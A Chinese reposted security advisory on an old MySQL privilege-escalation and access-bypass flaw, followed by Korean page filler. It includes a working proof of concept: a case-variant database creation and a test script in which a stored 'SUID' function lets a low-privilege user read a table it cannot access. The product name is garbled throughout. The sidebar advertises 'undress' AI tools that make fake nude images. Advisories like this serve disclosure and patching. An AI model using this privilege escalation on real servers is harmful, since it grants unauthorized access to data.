MySQL权限提升与安全限制问题探讨
以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。 受影响系统: MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合
以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。
受影响系统:
MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合)
描述:
BUGTRAQ ID: 19559
MySQL(和PHP搭配之最佳组合)是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
在MySQL(和PHP搭配之最佳组合)上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL(和PHP搭配之最佳组合)的文件系统支持区分大小写的文件名。
此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。
测试方法:
【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】
1、创建数据库
<ol class="dp-xml"> <li class="alt"><span><span>$ MySQL(和PHP搭配之最佳组合) -h my.MySQL(和PHP搭配之最佳组合).server -u sample -p -A sample </span></span></li> <li><span>Enter password: </span></li> <li class="alt"><span>Welcome to the MySQL(和PHP搭配之最佳组合) monitor. Commands end with ; or \g. </span></li> <li><span>Your MySQL(和PHP搭配之最佳组合) connection id is 263935 to server version: 4.1.16-standard </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database another; </span> </li> <li><span>ERROR 1044: Access denied for user 'sample'@'%' to database 'another' </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database sAmple; </span> </li> <li><span>Query OK, 1 row affected (0.00 sec) </span></li> </ol>
2、权限提升
<ol class="dp-xml"> <li class="alt"><span><span>--disable_warnings </span></span></li> <li><span>drop database if exists MySQL(和PHP搭配之最佳组合)test1; </span></li> <li class="alt"><span>drop database if exists MySQL(和PHP搭配之最佳组合)test2; </span></li> <li><span>drop function if exists f_suid; </span></li> <li class="alt"><span>--enable_warnings </span></li> <li><span># Prepare playground </span></li> <li class="alt"><span>create database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>create database MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span>create user malory@localhost; </span></li> <li><span>grant all privileges on MySQL(和PHP搭配之最佳组合)test1.* to malory@localhost; </span></li> <li class="alt"><span># Create harmless (but SUID!) function </span></li> <li><span>create function f_suid(i int) returns int return 0; </span></li> <li class="alt"><span>grant execute on function test.f_suid to malory@localhost; </span></li> <li><span>use MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span># Create table in which malory@localhost will be interested but to which </span></li> <li><span># he won't have any access </span></li> <li class="alt"><span>create table t1 (i int); </span></li> <li><span>connect (malcon, localhost, malory,,MySQL(和PHP搭配之最佳组合)test1); </span></li> <li class="alt"><span># Correct malory@localhost don't have access to MySQL(和PHP搭配之最佳组合)test2.t1 </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select * from MySQL(和PHP搭配之最佳组合)test2.t1; </span></li> <li><span># Create function which will allow to exploit security hole </span></li> <li class="alt"><span>delimiter |; </span></li> <li><span>create function f_evil () </span></li> <li class="alt"><span>returns int </span></li> <li><span>sql security invoker </span></li> <li class="alt"><span>begin </span></li> <li> <span>set @</span><span class="attribute">a:</span><span>= </span><span class="attribute-value">current_user</span><span>(); </span> </li> <li class="alt"> <span>set @</span><span class="attribute">b:</span><span>= (select count(*) from MySQL(和PHP搭配之最佳组合)test2.t1); </span> </li> <li><span>return 0; </span></li> <li class="alt"><span>end| </span></li> <li><span>delimiter ;| </span></li> <li class="alt"><span># Again correct </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select f_evil(); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span># Oops!!! it seems that f_evil() is executed in the context of </span></li> <li><span># f_suid() definer, so malory@locahost gets all info that he wants </span></li> <li class="alt"><span>select test.f_suid(f_evil()); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span>connection default; </span></li> <li><span>drop user malory@localhost; </span></li> <li class="alt"><span>drop database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>drop database MySQL(和PHP搭配之最佳组合)test2; </span></li> </ol>
建议:
厂商补丁:MySQL(和PHP搭配之最佳组合) AB,目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载。
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
AI Hentai Generator
AI Hentai를 무료로 생성하십시오.
인기 기사
뜨거운 도구
메모장++7.3.1
사용하기 쉬운 무료 코드 편집기
SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.
스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경
드림위버 CS6
시각적 웹 개발 도구
SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)
뜨거운 주제
7532
15
1379
52
82
11
55
19
21
79
MySQL : 쉽게 학습하기위한 간단한 개념
Apr 10, 2025 am 09:29 AM
MySQL은 오픈 소스 관계형 데이터베이스 관리 시스템입니다. 1) 데이터베이스 및 테이블 작성 : CreateAbase 및 CreateTable 명령을 사용하십시오. 2) 기본 작업 : 삽입, 업데이트, 삭제 및 선택. 3) 고급 운영 : 가입, 하위 쿼리 및 거래 처리. 4) 디버깅 기술 : 확인, 데이터 유형 및 권한을 확인하십시오. 5) 최적화 제안 : 인덱스 사용, 선택을 피하고 거래를 사용하십시오.
phpmyadmin을 여는 방법
Apr 10, 2025 pm 10:51 PM
다음 단계를 통해 phpmyadmin을 열 수 있습니다. 1. 웹 사이트 제어판에 로그인; 2. phpmyadmin 아이콘을 찾고 클릭하십시오. 3. MySQL 자격 증명을 입력하십시오. 4. "로그인"을 클릭하십시오.
MySQL : 세계에서 가장 인기있는 데이터베이스 소개
Apr 12, 2025 am 12:18 AM
MySQL은 오픈 소스 관계형 데이터베이스 관리 시스템으로, 주로 데이터를 신속하고 안정적으로 저장하고 검색하는 데 사용됩니다. 작업 원칙에는 클라이언트 요청, 쿼리 해상도, 쿼리 실행 및 반환 결과가 포함됩니다. 사용의 예로는 테이블 작성, 데이터 삽입 및 쿼리 및 조인 작업과 같은 고급 기능이 포함됩니다. 일반적인 오류에는 SQL 구문, 데이터 유형 및 권한이 포함되며 최적화 제안에는 인덱스 사용, 최적화 된 쿼리 및 테이블 분할이 포함됩니다.
Navicat에서 MySQL에 새로운 연결을 만드는 방법
Apr 09, 2025 am 07:21 AM
응용 프로그램을 열고 새로운 연결 (Ctrl n)을 선택하여 Navicat에서 새로운 MySQL 연결을 만들 수 있습니다. "MySQL"을 연결 유형으로 선택하십시오. 호스트 이름/IP 주소, 포트, 사용자 이름 및 비밀번호를 입력하십시오. (선택 사항) 고급 옵션을 구성합니다. 연결을 저장하고 연결 이름을 입력하십시오.
MySQL을 사용하는 이유는 무엇입니까? 혜택과 장점
Apr 12, 2025 am 12:17 AM
MySQL은 성능, 신뢰성, 사용 편의성 및 커뮤니티 지원을 위해 선택됩니다. 1.MYSQL은 효율적인 데이터 저장 및 검색 기능을 제공하여 여러 데이터 유형 및 고급 쿼리 작업을 지원합니다. 2. 고객-서버 아키텍처 및 다중 스토리지 엔진을 채택하여 트랜잭션 및 쿼리 최적화를 지원합니다. 3. 사용하기 쉽고 다양한 운영 체제 및 프로그래밍 언어를 지원합니다. 4. 강력한 지역 사회 지원을 받고 풍부한 자원과 솔루션을 제공합니다.
단일 스레드 레 디스를 사용하는 방법
Apr 10, 2025 pm 07:12 PM
Redis는 단일 스레드 아키텍처를 사용하여 고성능, 단순성 및 일관성을 제공합니다. 동시성을 향상시키기 위해 I/O 멀티플렉싱, 이벤트 루프, 비 블로킹 I/O 및 공유 메모리를 사용하지만 동시성 제한 제한, 단일 고장 지점 및 쓰기 집약적 인 워크로드에 부적합한 제한이 있습니다.
MySQL 및 SQL : 개발자를위한 필수 기술
Apr 10, 2025 am 09:30 AM
MySQL 및 SQL은 개발자에게 필수적인 기술입니다. 1.MySQL은 오픈 소스 관계형 데이터베이스 관리 시스템이며 SQL은 데이터베이스를 관리하고 작동하는 데 사용되는 표준 언어입니다. 2.MYSQL은 효율적인 데이터 저장 및 검색 기능을 통해 여러 스토리지 엔진을 지원하며 SQL은 간단한 문을 통해 복잡한 데이터 작업을 완료합니다. 3. 사용의 예에는 기본 쿼리 및 조건 별 필터링 및 정렬과 같은 고급 쿼리가 포함됩니다. 4. 일반적인 오류에는 구문 오류 및 성능 문제가 포함되며 SQL 문을 확인하고 설명 명령을 사용하여 최적화 할 수 있습니다. 5. 성능 최적화 기술에는 인덱스 사용, 전체 테이블 스캔 피하기, 조인 작업 최적화 및 코드 가독성 향상이 포함됩니다.
SQL이 행을 삭제 한 후 데이터를 복구하는 방법
Apr 09, 2025 pm 12:21 PM
백업 또는 트랜잭션 롤백 메커니즘이없는 한 데이터베이스에서 직접 삭제 된 행 복구는 일반적으로 불가능합니다. 키 포인트 : 거래 롤백 : 트랜잭션이 데이터를 복구하기 전에 롤백을 실행합니다. 백업 : 데이터베이스의 일반 백업을 사용하여 데이터를 신속하게 복원 할 수 있습니다. 데이터베이스 스냅 샷 : 데이터베이스의 읽기 전용 사본을 작성하고 데이터를 실수로 삭제 한 후 데이터를 복원 할 수 있습니다. 주의해서 삭제 명령문을 사용하십시오. 실수로 데이터를 삭제하지 않도록 조건을주의 깊게 점검하십시오. WHERE 절을 사용하십시오 : 삭제할 데이터를 명시 적으로 지정하십시오. 테스트 환경 사용 : 삭제 작업을 수행하기 전에 테스트하십시오.
